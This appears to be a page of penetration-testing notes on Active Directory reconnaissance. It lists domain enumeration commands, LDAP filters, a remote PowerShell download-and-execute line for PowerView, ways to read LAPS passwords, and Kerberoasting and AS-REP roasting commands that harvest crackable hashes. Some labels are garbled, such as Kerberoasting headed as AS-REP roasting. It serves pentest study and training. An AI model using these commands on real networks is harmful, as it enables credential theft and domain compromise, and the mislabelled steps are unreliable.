🤯
Hacker Mind
  • Penetration Testing Notes
    • 00 - Kali Linux Preparation
    • Page 1
    • Web Application (80/443)
      • XSS
      • LFI / Path Traversal
      • Wordpress
    • SMB (445)
    • LDAP
    • MSRPC (135)
    • MSSQL
    • Kerberos (88/tcp)
    • DNS (53)
    • IPv6
    • Import Nessus to Metasploit
  • STUCK? Look at this :D
  • Buffer Overflow
    • WinDbg
    • BoF Script Python
  • Active Directory Recon
    • Username Generation
    • PowerView
    • BloodHound
    • Flooding Attack
  • Payload
    • Sendemail
    • Phishing Payload
    • Bypass All The Things
      • AppLocker
      • MSBuild Shell
      • C# Runner
      • Payload Mod
      • Powershell
      • Bypass AV Linux
        • C Runner
  • Exploit
    • Brute Force
    • File Upload
    • Cracking
    • Shell & Stabilization
    • Database
    • MSSQL Injection
  • Tradecraft
    • Invoke-ReflectivePEInjection
  • Metasploit
    • Meterpreter Tricks
  • Privilege Escalation
    • Lateral Movement
    • Linux
    • Windows
  • Post Exploit
    • Active Directory
      • Kerberos
      • ACLs/ACEs
      • DCSync
      • Golden Ticket with krbtgt
      • LAPS
      • Page
      • Impersonate Token
    • Pivoting
      • Pivot in a Case
    • Transfer File
    • Exfiltration
    • Persistence
  • WiFi Pentesting
    • WPA-PSK
    • WPA-E (hostapd)
    • Attack WEP
    • Evil Twin - Wi-Fi
    • WPA3 Downgrade
  • Hardware Hacking
    • Information Gathering
  • Practice & Lab
Powered by GitBook
On this page
  • Check User's Priviledge in Domain
  • Global Group = PswReader
  • Object Control List (ACL)
  • LDAP Search
  • Have User & Pass SVC?
  • Have User List?
  • TGT?
  • PsLoggedon.exe
  • Seatbelt.exe

Active Directory Recon

Enum all inside domain

Check User's Priviledge in Domain

net user <current user> /domain

Global Group = PswReader

this group is able to read LAPS

Global Group memberships *Domain Users *PswReaders

// import the powerview.ps1
IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/powerview.ps1')

// dump the password information

Get-ADObject <hostname1>,<hostname2>

Object Control List (ACL)

GenericAll --> Full permission on object
GenericWrite --> Edit certain attributes on the object
WriteOwner --> Change ownership of the object
WriteDACL --> Edit ACE's applied to object
AllExtendedRights --> Change password, reset password, etc.
ForceChangePassword --> Password change for object
Self (Self-Membership) --> Add ourselves to for example a group

LDAP Search

Priviledges: Domain User

  1. LDAPSearch.ps1

$ldapFilter = " PUT FILTER HERE "
$domain = New-Object System.DirectoryServices.DirectoryEntry
$search = New-Object System.DirectoryServices.DirectorySearcher
$search.SearchRoot = $domain
$search.Filter = $ldapFilter
$search.SearchScope = "Subtree"

$results = $search.FindAll()
foreach ($result in $results)
{
    $object = $result.GetDirectoryEntry()
    Write-Host "Object Name = " $object.name
}

Filter

LDAP RECON
================

# look at all domain controllers
(primaryGroupID=516)

# look at all domain admins

(&(objectCategory=person)(objectClass=user)((memberOf=CN=Domain Admins,CN=Users,DC=TEST,DC=local)))

# unconstrained Delegations users
(userAccountControl:1.2.840.113556.1.4.803:=524288)

  1. Using Powershell


# show the password in the description
Import-Module ActiveDirectory
Get-ADObject -LDAPFilter "(&(objectClass=user)(description=*pass*))" -property * | Select-Object SAMAccountName, Description, DistinguishedName

Have User & Pass SVC?

Some times services account indicate a Ticket possibility: Don't miss this check:

[Have SPN]

# ASP-REP Roasting attack

# identification
impacket-GetUserSPNs -dc-ip <IP DC> <domain>/<username>


impacket-GetUserSPNs -dc-ip <IP DC> <domain>/<username>:<password> -request
impacket-GetUserSPNs -dc-ip <IP DC> -request '<domain' -format hashcat




Rubeus.exe asreproast /format:hashcat /outfile:C:temphash.txt

Have User List?

Is there config "kerberost pre-auth is disable" on user.

impacket-GetNPUsers <domain>/ -usersfile users.txt -format hashcat

# login with evil-winrm
evil-winrm -i <ip> -u <username> -p <password>

TGT?

look at htb scrambled

PsLoggedon.exe

Check logged on users on the remote computer via active directory.

.\PsLoggedon.exe \\<computername>

Seatbelt.exe

.\Seatbelt.exe -group=all

PreviousBoF Script PythonNextUsername Generation

Last updated 8 months ago

ref:

https://www.youtube.com/watch?v=-xF6bvbXCGE&list=PL8383xoY3ZibjcFWjDhabUGOjoZ4Ke8Yu&index=2